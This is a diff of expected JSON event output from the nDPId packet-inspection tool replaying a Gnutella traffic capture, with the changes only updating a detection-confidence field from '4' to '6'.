00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":139506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139506,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYr4AAIAR3CUKAAIPP+SvqXAJB5AAWZrqJBYxAlmizjMkdrKTCQRuaEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":139506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139506,"pkt":"UlQAEjUCCAAn5uVZCABFAABtewQAAIAR+1sKAAIPYiNV7nAJfa0AWf9BqZoxAuJR0ARRd\/sw16p3JUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":2,"flow_last_seen":139668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":139668,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBs0AAEARedS1djXUCgACD3UucAkC3zh9hfMxArbJ5SyHh4zpjzvfRkQAAMACAAAGR1RLRwAAtKvoCtBqd4zMwnzU9a6qM7XaCosEtXY11HUuAQAAAARfhHP4FEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkEdUS0cAALyzuhm5M4uYhLkABGRqZbdy38iOBGIjVe59rUdUS0cAALrtVGIh6HCMeHje7ytMi7+QCmj9BC\/grq4Yyg=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139669,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":139669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139669,"pkt":"UlQAEjUCCAAn5uVZCABFAABtmlYAAIARtYwKAAIPL+CurnAJGMoAWfYTyxgxAvXWHJDN+FF7HrIjWEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139669,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139669,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":3,"flow_last_seen":139669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139669,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTeQAAIAR4qUKAAIPSfqz7XAJUXAAWTtzDAwxAhYFwQyFnvxYxDh4UUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":3,"flow_last_seen":139669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139669,"pkt":"UlQAEjUCCAAn5uVZCABFAABtxQMAAIAR4QkKAAIPvKXLvnAJVesAWccLy3UxAr1ooy\/Zmhwx1EOQ8UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":3,"flow_last_seen":139695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139695,"pkt":"UlQAEjUCCAAn5uVZCABFAABtX58AAIARHekKAAIPXNlUEHAJTv8AWRxrcuoxAvEddJz1CNyRxwOe00QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
01409{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":2,"flow_last_seen":139713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":139713,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBs8AAEARdY8\/5K+pCgACDweQcAkC3wv2JBYxAlmizjMkdrKTCQRuaEQAAMACAAAGR1RLRwAAvVxlUBplmElM4+WSnDqN9PxphG0EP+SvqQeQAQAAAAQC89xEFEdUS0cAAISEnKMAahWoBBfUee10B\/B49\/r0BBh0QITIG0dUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo4w=="} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2382,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":3,"flow_last_seen":139724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139724,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGLkAAIARtUAKAAIPsGOwFHAJGMoAWZkZdrExAg1GSrdXL+O9TXzC9kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2383,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":3,"flow_last_seen":139724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139724,"pkt":"UlQAEjUCCAAn5uVZCABFAABtceoAAIARV2EKAAIPrbe3bnAJ6hAAWRX5yaAxAh\/9BvdPXg4EHkta+EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":140848,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2525,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":152618,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":152618,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/0AAIAR2ksKAAIPucvaXHAJ3oIAWWGJo3cxAvUqie+XZ8I4MOlY7kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2526,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":152619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":152619,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeIAAIARALwKAAIPQh7dtXAJLuwAWUb9hToxArVYIH1ZKsd\/uJMQM0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":152619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":152619,"pkt":"UlQAEjUCCAAn5uVZCABFAABthP4AAIARBkEKAAIPLVh12nAJGv0AWYQlGHcxArF+TA2rx0u82pqvx0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 
@@ -1309,7 +1309,7 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2585,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":157736,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":157736,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGY8AAIAR6JQKAAIPXwrNQ3AJLVMAWaXpjUExAjTUCUmhKozUcF9w9kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":160009,"flow_last_seen":160009,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":160009,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":160009,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":160009,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4K8AAAER3GoKAAIP7\/\/\/+snlB2wAtiNJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":160009,"flow_last_seen":160009,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":160009,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":160009,"flow_last_seen":160009,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":160009,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2621,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":161017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":161017,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LAAAAER3GkKAAIP7\/\/\/+snlB2wAtiNJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2635,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":162017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":162017,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LEAAAER3GgKAAIP7\/\/\/+snlB2wAtiNJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":3,"flow_last_seen":162802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":162802,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOYEAAIAR2+0KAAIPSMnQOXAJltkAWe6G\/a8xAp990wTPUYO\/Pfo6nUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 
@@ -1323,39 +1323,39 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2725,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":3,"flow_last_seen":168391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168391,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAwAAAIARQCcKAAIPtXY11HAJdS4AWVKoRtYxAgh8ZUKNU31EKcU+K0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} 